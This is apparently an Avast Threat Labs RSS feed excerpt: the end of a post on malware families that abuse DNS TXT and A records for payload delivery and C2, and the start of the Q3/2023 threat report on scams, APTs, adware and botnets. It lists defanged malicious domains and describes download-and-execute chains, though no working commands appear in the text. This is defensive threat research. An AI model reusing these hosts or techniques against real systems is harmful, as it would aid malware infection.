<p>Let’s peek under the hood of a couple of advanced malware families that leverage DNS for distributing additional payloads and obfuscating the communication with Command & Control (C2) servers.</p>
<h3 class="wp-block-heading">ViperSoftX</h3>
<p><a href="https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/" target="_blank" rel="noreferrer noopener">ViperSoftX</a> is a long-standing information stealer. Reaching back at least to 2020, it is mostly bundled with software from unofficial sources and cracks, commonly distributed over torrents. Its wide capabilities, which are to this day intensively developed and improved, go from stealing cryptocurrencies, clipboard swapping, fingerprinting the infected device, downloading and executing additional payloads, to further deploying a malicious browser extension called <a href="https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/" target="_blank" rel="noreferrer noopener">VenomSoftX</a>. </p>
<p>One of the features the malware authors also implemented is querying the DNS database to retrieve a <code>TXT</code> response from a registered C2 domain. This <code>TXT</code> record contains an execution command to download further malware stages. We can demonstrate this behavior ourselves by using nslookup on the malicious domain. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image.png"><img loading="lazy" decoding="async" width="850" height="240" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image.png" alt="" class="wp-image-7893" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-300x85.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-768x217.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a><figcaption class="wp-element-caption"><em>DNS TXT record containing a PowerShell command</em></figcaption></figure></div>
<p>This command, returned in the form of a DNS <code>TXT</code> response, downloads an additional payload from <code>microsoft-analyse[.]com</code>. The file <code>last.txt</code> contains an obfuscated PowerShell script, carrying further malware stage when executed.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-1.png"><img loading="lazy" decoding="async" width="1024" height="326" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-1-1024x326.png" alt="" class="wp-image-7894" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-1-1024x326.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-1-300x96.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-1-768x245.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-1.png 1227w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption"><em>Payload script downloaded from the DNS TXT response script</em></figcaption></figure></div>
<h3 class="wp-block-heading">DarkGate</h3>
<p>Also known as <a href="https://decoded.avast.io/janrubin/complex-obfuscation-meh/" target="_blank" rel="noreferrer noopener">MehCrypter</a> and <a href="https://decoded.avast.io/janrubin/meh-2-2/" target="_blank" rel="noreferrer noopener">Meh</a>, DarkGate is another advanced information stealer. This stealer, these days weaponized as malware-as-a-service (MaaS), continues to add new features to its operations. </p>
<p>Alongside features like keylogging, stealing clipboard contents as well as cryptocurrency wallets, and RAT capabilities, DarkGate can also make DNS requests to query DNS <code>TXT</code> responses. </p>
<p>Currently, one of the distribution methods starts as phishing (e.g., in a form of a PDF), with the document stating it cannot be loaded properly and the user needs to click on an “Open this document” button. This action downloads a ZIP archive, containing a LNK file with an icon of a PDF (Adobe Reader). However, after opening this LNK file, the malware will instead execute a command making a DNS request, reading the <code>TXT</code> field from the response.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-2.png"><img loading="lazy" decoding="async" width="850" height="120" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-2.png" alt="" class="wp-image-7895" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-2.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-2-300x42.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-2-768x108.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a><figcaption class="wp-element-caption"><em>Command executed from a LNK file, performing a DNS query</em></figcaption></figure></div>
<p>After the <code>Taste.cmd</code> script is downloaded and executed, a further series of commands is executed, deploying the DarkGate information stealer on the infected machine.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-3.png"><img loading="lazy" decoding="async" width="850" height="312" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-3.png" alt="" class="wp-image-7896" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-3.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-3-300x110.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-3-768x282.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a><figcaption class="wp-element-caption"><em>Taste.cmd script (beautified), an intermediary that ensures the execution of DarkGate</em></figcaption></figure></div>
<h3 class="wp-block-heading">DirtyMoe</h3>
<p>Since 2016, the notorious <a href="https://decoded.avast.io/martinchlumecky/dirtymoe-1/" target="_blank" rel="noreferrer noopener">DirtyMoe</a> malware has been infecting victims all over the world, focusing the most on Asia and Africa. This multi-modular backdoor is equipped with a variety of functionalities, ranging from exploiting network protocols, cryptojacking, performing DDoS attack, leveraging rootkit capabilities, and much more. </p>
<p>This is further underlined by DirtyMoe’s sophisticated network communication. The malware makes DNS queries using a predefined list of DNS servers and retrieves a list of IP addresses for a single domain in the A records fields. However, these IP addresses, even though semantically correct, are artificial and they either do not exist or they are not pointing to the actual addresses desired by the malware. The real IP addresses are instead derived from these A records by an additional algorithm. Each of these derived IP addresses is then tried, one of them being the real C2 server. </p>
<p>Finally, the list of the A records also changes rapidly and regularly. This <code>DNS fast fluxing</code> technique further obfuscates the real C2 servers from the fake addresses, making the whole malware communication even more opaque for the defenders. </p>
<p>In the example below, the malicious server <code>rpc[.]1qw[.]us</code> provides a list of IP addresses (<code>A</code> records). However, these IP addresses are artificial, and they are used for further derivation of the real IP addresses.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-4.png"><img loading="lazy" decoding="async" width="632" height="461" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-4.png" alt="" class="wp-image-7897" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-4.png 632w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-4-300x219.png 300w" sizes="(max-width: 632px) 100vw, 632px" /></a><figcaption class="wp-element-caption"><em>DNS records are changed rapidly and regularly</em></figcaption></figure></div>
<h3 class="wp-block-heading">Crackonosh</h3>
<p>Similar to ViperSoftX, <a href="https://decoded.avast.io/danielbenes/crackonosh-a-new-malware-distributed-in-cracked-software/" target="_blank" rel="noreferrer noopener">Crackonosh</a> is distributed along with illegal, cracked copies of popular software. If the unsuspecting victim installs such cracked software, they inadvertently deploy an XMRig coinminer onto their system, leveraging its resources to profit the attackers. </p>
<p>Crackonosh contains a lot of advanced techniques, such as disabling antivirus software and Windows Update, as well as performing other anti-detection and anti-forensic actions. </p>
<p>Additionally, Crackonosh also queries the DNS database as part of its update mechanism. To do so, Crackonosh reads a <code>TXT</code> record from the registered server’s response which contains a string like <code>ajdbficadbbfC@@@FEpHw7Hn33</code>. This string is then parsed and both an IP address as well as a port are derived from it. With this information, Crackonosh downloads a file <code>wksprtcli.dll</code>, containing the malware’s update routine.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-5.png"><img loading="lazy" decoding="async" width="773" height="81" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-5.png" alt="" class="wp-image-7898" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-5.png 773w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-5-300x31.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-5-768x80.png 768w" sizes="(max-width: 773px) 100vw, 773px" /></a><figcaption class="wp-element-caption"><em>Crackonosh decrypting the IP address from a string received in the TXT record</em></figcaption></figure></div>
<h2 class="wp-block-heading">DNS protection in Avast</h2>
<p>At Avast, both our free and paid versions protect users against DNS-based threat. This protection, available since version 23.8, includes:</p>
<ul>
<li>Support for detecting C2 callbacks, data exfiltration, and payload delivery through the TXT records </li>
<li>Support for detecting DNS C2 tunneling through the malicious NS servers </li>
<li>Scanner supports scanning of A, AAAA, PTR, NX, TXT DNS records, in both directions</li>
</ul>
<p>Our paid plan also contains an additional feature, called <a href="https://support.avast.com/en-us/article/antivirus-real-site-faq" target="_blank" rel="noreferrer noopener">Real Site</a>, which provides an encrypted connection between your web browser and Avast’s own DNS server to prevent hijacking. In other words, Real Site ensures that the displayed website is the authentic one.</p>
<h2 class="wp-block-heading">Conclusion</h2>
<p>Understanding DNS threats is crucial for defenders. We described how threat actors can leverage DNS to carry out specific attacks. We also provided examples of advanced malware families that use such techniques, distributing additional malware payloads, obfuscating the communication, tunneling their C2 commands through the network, and more. With Avast’s DNS scanning capabilities, we protect our users against these types of threats. </p>
<p>The post <a href="https://decoded.avast.io/threatintel/opening-a-new-front-against-dns-based-threats/">Opening a new front against DNS-based threats</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></content:encoded>
</item>
<item>
<title>Avast Q3/2023 Threat Report</title>
<link>https://decoded.avast.io/threatresearch/avast-q3-2023-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q3-2023-threat-report</link>
<dc:creator><![CDATA[Threat Research Team]]></dc:creator>
<pubDate>Thu, 16 Nov 2023 08:00:00 +0000</pubDate>
<category><![CDATA[Mobile]]></category>
<category><![CDATA[PC]]></category>
<category><![CDATA[Reports]]></category>
<category><![CDATA[desktop]]></category>
<category><![CDATA[malware]]></category>
<category><![CDATA[mobile]]></category>
<category><![CDATA[report]]></category>
<category><![CDATA[risk]]></category>
<category><![CDATA[threats]]></category>
<guid isPermaLink="false">https://decoded.avast.io/?p=7774</guid>
<description><![CDATA[<p>Stunning 50% Surge in Blocked Attacks, Resulting in 1 Billion Monthly Blocks</p>
<p>The post <a href="https://decoded.avast.io/threatresearch/avast-q3-2023-threat-report/">Avast Q3/2023 Threat Report</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></description>
<content:encoded><![CDATA[
<h3 class="wp-block-heading"><strong>Stunning 50% Surge in Blocked Attacks, Resulting in 1 Billion Monthly Blocks</strong></h3>
<h2 class="wp-block-heading">Foreword</h2>
<p>As we delve into the Q3/2023 Threat Report, it is evident that the past quarter was not an ordinary one. Typically, vacation time ushers in a decrease in online activity, offering a brief respite from cyber threats. This year, however, the digital landscape took an unexpected turn. Despite reduced online presence, our detection systems recorded a jaw-dropping 50% increase in unique blocked attacks, leading to new all-time highs. On average, <strong>we blocked over one billion unique malware attacks each month during Q3/2023</strong>. The surge was driven by a substantial rise in web-based threats, particularly social engineering, and malvertising. Consequently, the overall risk ratio, representing the risk of being targeted and protected by us, now exceeds 30%. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="667" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Threat-Labs-infographic-667x1024.png" alt="" class="wp-image-7779" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Threat-Labs-infographic-667x1024.png 667w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Threat-Labs-infographic-196x300.png 196w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Threat-Labs-infographic-768x1178.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Threat-Labs-infographic.png 792w" sizes="(max-width: 667px) 100vw, 667px" /></figure></div>
<p>The adoption of AI by threat actors, particularly in deepfake financial scams, is accelerating. The nefarious use of deepfakes targeting TikTok users, often featuring public figures such as Elon Musk, has emerged as a growing concern. More on this can be found in our Featured story section. </p>
<p>Furthermore, the threat landscape was marked by a doubling of the adware threat level, indicating a significant escalation in adware. South America, Africa, Southeast Europe, and East Asia bore the brunt of this surge. </p>
<p>Apart from adware, there were significant developments in the realm of botnets. The FBI’s attempt to dismantle the Qakbot botnet led to a noticeable drop in activity. However, the operation does not appear to be entirely extinguished, as some associated threat actors have already begun to shift to alternative strains, such as DarkGate. </p>
<p>In addition, information stealers recorded a substantial increase in risk ratio, with Ukraine (44%), the United States (21%), and India (16%) experiencing the most significant spikes. AgentTesla dominated this landscape, while the once-notorious Raccoon Stealer seems to be losing its momentum and receding from the forefront. </p>
<p>Remote Access Trojans (RATs) also continue to be a growing trend. The increase of RATS, first observed in Q2/2023, continued in Q3/2023 primarily driven by the Remcos RAT and Warzone. Countries such as Portugal (148% increase), Poland (55%), and Slovakia (43%) have experienced a significant rise in attacks. The XWorm strain remains prolific, consistently releasing new versions and expanding its reach. </p>
<p>Furthermore, the emergence of a new vulnerability, CVE-2023-38831, in the popular WinRAR software caught the attention of threat actors, including APTs, RATs, and malware downloaders. Given the software’s widespread use, these exploits are likely to persist, emphasizing the importance of keeping software updated. For more on these vulnerabilities, delve into our Exploits section. </p>
<p>The domain of scams has undergone significant changes, with dating scams witnessing a 34% increase quarter-on-quarter. Belgium, Germany, Canada, and the United States are among the top targets for these scammers. To compound the challenge, our researchers uncovered a new threat, which we have named Love-GPT. This AI-driven tool assists threat actors in creating realistic personas, amplifying the success of their fraudulent activities. </p>
<p>Phishing attacks have also experienced a 14% quarterly increase, with threat actors innovatively utilizing IPFS (InterPlanetary File System) to bypass conventional defense mechanisms. Australia, in particular, saw a substantial surge in targeted email scams. </p>
<p>Finally, the mobile threat landscape remains dynamic, marked by espionage tactics. Spyware mimicking a missile warning application used in Israel emerged in response to escalating tensions between Israel and Palestine, with the aim of stealing victim data. Also, the introduction of Invisible Adware, with over two million downloads from the Google PlayStore, contributed to the rising risk of mobile adware. Brazil, India, and Argentina remain the top-affected countries. Also, the gap left by the takedown of FluBot in mobile banking trojans is gradually being filled. This quarter saw the detection of new and resurrected bankers, including Xenomorph, GoldDigger, and SpyNote. Turkey, Spain, and France continue to be the prime targets for attackers in this category. Popular messenger application mods, such as Telegram, Signal, and WhatsApp, continue to be exploited to serve spyware. Additionally, SpyLoans continues to spread on PlayStore, posing extortion threats to vulnerable victims. </p>
<p>In conclusion, Q3/2023 has unveiled an unprecedented level of cyber threats. The surge in threat activity during a season that typically sees reduced online presence is a cause for concern. As we move into the winter season, traditionally marked by higher threat levels, we are watchful to see if this trend continues to escalate. </p>
<p>Thank you for your continued trust in Avast. Stay safe and secure.</p>
<p class="has-text-align-right"><em>Jakub Křoustek, Malware Research Director</em></p>
<h2 class="wp-block-heading">Methodology</h2>
<p>This report is structured into two main sections: <em>Desktop-related threats</em>, where we describe our intelligence around attacks targeting the Windows, Linux, and Mac operating systems, with a specific emphasis on web-related threats, and <em>Mobile-related threats</em>, where we describe the attacks focusing on Android and iOS operating systems. </p>
<p>We use the term “<em>risk ratio”</em> in this report to denote the severity of specific threats. It is calculated as a monthly average of “Number of attacked users / Number of active users in a given country.” Unless stated otherwise, calculated risks are only available for countries with more than 10,000 active users per month. </p>
<p>A blocked attack is defined as a unique combination of the protected user and a blocked threat identifier within the specified period. </p>
<p>In this Threat Report, we started with a more fine-grained labelling of various Scam threat types, which resulted in a separate tracking of e.g., malvertising compared to the previous reports. Furthermore, we have included some more threat data sources to provide even better threat landscape visibility. </p>
<h2 class="wp-block-heading">Featured Story: TikTok Finance Scams: An Escalating Threat Fueled by Artificial Intelligence</h2>
<p>TikTok, known for its virality and rapidly circulating digital trends, has emerged as a fertile ground for financial scams, specifically those involving cryptocurrency. The platform’s wide reach, coupled with its appeal to younger audiences, presents an attractive prospect for malicious actors aiming to exploit unsuspecting users. </p>
<p>The scams operate under a facade of legitimacy, often initiated with a deepfake video of a reputable figure endorsing a cryptocurrency exchange. Users are enticed to sign up on the purported exchange using a promo code, which allegedly credits their account with a significant amount of bitcoin. However, upon attempting to withdraw these funds, the platform mandates a preliminary transfer of bitcoin to “verify” the user’s account. Unwittingly, victims who comply with this requirement find that not only is the promised bitcoin unattainable, but also any transferred funds to the platform are irretrievably lost to the cybercriminals orchestrating the scam. </p>
<p>At the heart of these scams is the illicit utilization of Artificial Intelligence (AI) to create deepfake videos. Notorious personalities such as Elon Musk, Mr. Beast, Sam Altman, Warren Buffet, Joe Rogan, Donald Trump, and Tucker Carlson are impersonated in fraudulent endorsements of cryptocurrency exchanges. These fabricated endorsements lure users with promises of substantial Bitcoin rewards, setting the stage for financial deception.</p>
<div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained"><div class="wp-block-group__inner-container">
<div class="wp-block-columns is-layout-flex wp-container-core-columns-layout-2 wp-block-columns-is-layout-flex">
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<figure class="wp-block-video"><video controls src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Trump.mp4"></video></figure>
</div>
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<figure class="wp-block-video"><video controls src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Musk.mp4"></video></figure>
</div>
</div>
<p class="has-text-align-center has-small-font-size"><em>Samples of videos circulating on TikTok impersonating Elon Musk and Donald Trump</em></p>
</div></div>
<p><a href="https://decoded.avast.io/threatintel/insights-into-the-ai-based-cyber-threat-landscape/" target="_blank" rel="noreferrer noopener">The malicious use of AI</a>, particularly deepfake technology, underscores the escalating sophistication of cyber adversaries. By creating convincing counterfeit videos of reputable individuals, scammers successfully manipulate public trust. This exploitation not only exhibits a concerning trend of cyber threats on social media platforms but also exemplifies the potential of AI in augmenting the effectiveness of financial scams. Deepfake technology, once the domain of high-skilled individuals, is becoming increasingly accessible, making it all the more difficult to discern real endorsements from fabricated ones. </p>
<p>Initially confined to English-speaking audiences, these scams have transcended linguistic barriers, making inroads into non-English speaking regions. Recent manifestations of these scams have been observed in various languages including Spanish, German, Italian and French, reflecting a broadening threat landscape. The multilingual expansion of these scams signifies a global threat and underscores the necessity for multinational cooperation in tackling these AI-driven scams. </p>
<div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained"><div class="wp-block-group__inner-container">
<div class="wp-block-columns is-layout-flex wp-container-core-columns-layout-3 wp-block-columns-is-layout-flex">
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="461" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Italian-461x1024.jpeg" alt="" class="wp-image-7789" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Italian-461x1024.jpeg 461w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Italian-135x300.jpeg 135w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Italian-768x1708.jpeg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Italian-691x1536.jpeg 691w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Italian.jpeg 921w" sizes="(max-width: 461px) 100vw, 461px" /></figure>
</div>
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="461" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/French-461x1024.jpeg" alt="" class="wp-image-7790" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/French-461x1024.jpeg 461w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/French-135x300.jpeg 135w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/French-768x1708.jpeg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/French-691x1536.jpeg 691w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/French.jpeg 921w" sizes="(max-width: 461px) 100vw, 461px" /></figure>
</div>
</div>
<p class="has-text-align-center has-small-font-size"><em>Screenshots of scam videos in Italian and French circulating on TikTok</em> </p>
</div></div>
<p>Though TikTok is the primary stage for these scams, evidence suggests a multi-platform approach by malicious actors. Platforms like YouTube have also been utilized to disseminate scam content, indicating a broader digital footprint and an extended reach of these deceptive practices. TikTok alone has more than 1 billion monthly active users, which makes the surface attack huge. When we started blocking access to these scam websites, we protected several thousand users in a matter of a few days. </p>
<p>The TikTok scams are not isolated incidents but rather indicators of a growing trend of AI-driven cyber threats. The ease of spreading misinformation through deepfake technology, coupled with the allure of quick financial gains, is a potent combination that may pave the way for more sophisticated scams in the future. The potential ramifications extend beyond individual economic loss to a broader erosion of trust in digital platforms and notable personalities.</p>
<p class="has-text-align-right"><em>Luis Corrons, Security Evangelist</em></p>
<h2 class="wp-block-heading">Desktop-Related Threats </h2>
<h3 class="wp-block-heading">Advanced Persistent Threats (APTs)</h3>
<p><em>An Advanced Persistent Threat (APT) is a type of cyberattack that is conducted by highly skilled and determined hackers who have the resources and expertise to penetrate a target’s network and maintain a long-term presence undetected.</em> </p>
<p>APT groups are getting increasingly abusing imperfect validation processes for acquiring a driver signature. Signed drivers, typically issued by reputable vendors, are presumed to be safe and authorized for use within an operating system. APTs, by subverting this trust, not only bypass detection mechanisms but also gain stealthy and privileged access to a targeted system, effectively rendering traditional security protocols obsolete. This daring approach challenges the very foundation of cybersecurity, highlighting the need for continuous innovation and vigilance in defending against evolving APT threats. </p>
<p>In early June 2023, we discovered unknown signed drivers by Microsoft. These signed drivers had been distributed by the NSecRTS.exe signed binary, attributed to Shandong Anzai Information Technology Co., Ltd. It’s worth noting that NSecRTS is recognized as a regular monitoring software and has been mentioned by the <a href="https://ti.qianxin.com/blog/articles/genuine-surveillance-software-used-by-hackers/" target="_blank" rel="noreferrer noopener">QiAnXin Virus Response Center</a>. </p>
<p>Furthermore, we identified that the NSecRTS.exe was dropping a driver signed by Microsoft. Upon conducting an extensive investigation, we uncovered multiple malicious activities associated with this driver. One of them was injecting custom RAT in legitimate processes. </p>
<p>Our observations led us to identify victims in the Philippines and Thailand. Despite gathering extensive information, we were unable to definitively attribute the attacks to a specific entity.  </p>
<p>Active geopolitical conflicts often attract the attention of APTs due to the volatile and chaotic nature of such environments. These groups, which are often state-sponsored and highly organized, see conflicts as opportunities to exploit the instability for their own strategic gains.  The fog of war provides a convenient cover for their activities, allowing them to leverage the chaos to further their agendas, be it political, economic, or military. Notably, APTs have continued to leverage the ongoing war in Ukraine, and additional conflicts, such as the one in Nagorno-Karabakh, have emerged on their radar. </p>
<p>One of the go-to infection vectors for the APT groups this quarter was CVE-2023-38831 which is a vulnerability in WinRAR allowing an attacker to run arbitrary code on the victim’s machine. In many cases victims receive a malicious archive as an attachment to a phishing email. When opening the archive with a vulnerable version of WinRAR, the victim is unwillingly executing malicious code which might lead to an infection of the machine. We could see it being abused by multiple threat actors including attacks targeting Ukrainian government institutions, military, and governments in countries like Malasia, Vietnam, Philippines and more.  </p>
<p>Infamous entities such as Lazarus, MustangPanda, and APT41 remain relentless in their global campaigns, consistently refining their tactics and expanding their malware arsenal. These groups continually explore novel techniques, introducing fresh tools and incorporating languages like Nim and Rust into their toolkits.</p>
<p class="has-text-align-right"><em>Luigino Camastra, Malware Researcher</em><br><em>Igor Morgenstern, Malware Researcher</em></p>
<h3 class="wp-block-heading">Adware</h3>
<p><em>Adware is considered unwanted if installed without the user’s consent, tracks browsing behavior, redirects web traffic, or collects personal information for malicious purposes such as identity theft.</em> </p>
<p>Adware is becoming popular due to the possibilities of monetization and of spreading potentially unwanted programs (PUP) and malware. Although malware spreading via adware is not the primary method to infect victims’ machines, we have focused on adware detections in Q3/2023 to monitor this potential threat. </p>
<p>The results of more precise adware detections can be seen in the chart below. This quartile shows an increase of adware activities that is caused by the SocialBar adware. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="890" height="351" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q3_malware_adware.png" alt="" class="wp-image-7807" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q3_malware_adware.png 890w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q3_malware_adware-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q3_malware_adware-768x303.png 768w" sizes="(max-width: 890px) 100vw, 890px" /><figcaption class="wp-element-caption"><em>Global Avast risk ratio from adware for Q2/2023 and Q3/2023</em></figcaption></figure></div>
<p>The new detections help us to specify a global overview. Our telemetry reports the four most active regions in point of adware threats; namely, South America, Africa, Southeast Europe, and East Asia. See the map below. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="890" height="555" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02-map_2023_Q2_Q3_malware_adware.gif" alt="" class="wp-image-7808"/><figcaption class="wp-element-caption"><em>Map showing the global risk ratio for Adware in Q3/2023 and Q2/2023</em></figcaption></figure></div>
<h4 class="wp-block-heading">Adware Share </h4>
<p>The new detections reduced the ratio of unknown strains from 33% to 6%. The SocialBar is the adware market leader in Q3/2023 with 58%. The list below illustrates the most used ad servers with funny DNS records: </p>
<ul>
<li>hissedassessmentmistake[.]com </li>
<li>trustworthyturnstileboyfriend[.]com </li>
<li>happeningurinepomposity[.]com </li>
<li>disgracefulforeword[.]com </li>
<li>secondquaver[.]com </li>
<li>usetalentedpunk[.]com </li>
<li>lyricsgrand[.]com </li>
</ul>
<p>The rest of the shares are allocated to other adware strains as follows: </p>
<ul>
<li>MudOrange (7%) </li>
<li>DealPly (3%) </li>
<li>RelevantKnowledge (2%) </li>
<li>Neoreklami (2%) </li>
<li>MicroTag (2%) </li>
</ul>
<p class="has-text-align-right"><em>Martin Chlumecký, Malware Researcher</em></p>
<h3 class="wp-block-heading">Bots </h3>
<p><em>Bots are threats mainly interested in securing long-term access to devices with the aim of utilizing their resources, be it remote control, spam distribution, or denial-of-service (DoS) attacks.</em> </p>
<p>Probably the most impactful change in the botnet landscape occurred at the end of August – the FBI-led attempt to take down and dismantle the Qakbot botnet. Interestingly, the target was not just its Command and Control (C&C) infrastructure, but they also attempted to disconnect infected clients from the botnet, effectively making it harder to resurrect the botnet under a new infrastructure. There is already an apparent drop in the number of clients attempted to be recruited into the botnet which has dropped to one fifth of the “usual” value during August. While this is good news from the botnet perspective, this has not eliminated Qakbot-associated spam delivery capabilities. The threat actor associated with Qakbot distribution (TA577) began to distribute DarkGate as one of their phishing payloads soon after Qakbot’s takedown. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/qakbot-stats-1024x404.png" alt="" class="wp-image-7809" style="width:766px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/qakbot-stats-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/qakbot-stats-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/qakbot-stats-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/qakbot-stats-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/qakbot-stats-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Number of users protected from Qakbot throughout Q3/2023</em></figcaption></figure></div>
<p>We are keeping our eye on the threat group NoName056(16) and their DDosia project. Its number of members has exceeded 13,000 users by the end of September. Based on the numbers from the previous quarter, they managed to gain some momentum with a steady increase of approximately 1,000 members every month. Their <em>modus operandi</em> remains the same – DDoS attacks, accusations of Russophobia and boasting about their accomplishments. It is quite unfortunate that the usage of misleading terminology by mainstream media, such as mislabeling DDoS attacks as hacks or labeling their perpetrators as hackers, sometimes unwittingly inflates the public perception of such attacks, providing much desired media coverage boost to the perpetrators. This is especially true for Internet activist groups where media coverage also boosts the group’s credit in the community, further fueling their potential recruitment pool.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="890" height="444" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02-ddosia-members.png" alt="" class="wp-image-7810" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02-ddosia-members.png 890w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02-ddosia-members-300x150.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02-ddosia-members-768x383.png 768w" sizes="(max-width: 890px) 100vw, 890px" /><figcaption class="wp-element-caption">Number of DDosia members in 2023</figcaption></figure></div>
<p>As for targets, most of the targeted top-level domains (TLDs) were .<em>pl</em> (Poland, 15%), .<em>lt </em>(Lithuania, 11%), and .<em>it </em>(Italy, 9%). The former two are not a shocking surprise as there are active involvements in these regions with the Ukraine-Russia conflict. In case of Italy, the group seemed to react to Joe Biden’s meeting with Italian PM Giorgia Meloni. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="576" height="385" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ddosia-screenshot.png" alt="" class="wp-image-7811" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ddosia-screenshot.png 576w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ddosia-screenshot-300x201.png 300w" sizes="(max-width: 576px) 100vw, 576px" /><figcaption class="wp-element-caption"><em>NoName057(16)’s comment on Joe Biden’s meeting with Italian PM Georgia Meloni</em></figcaption></figure></div>
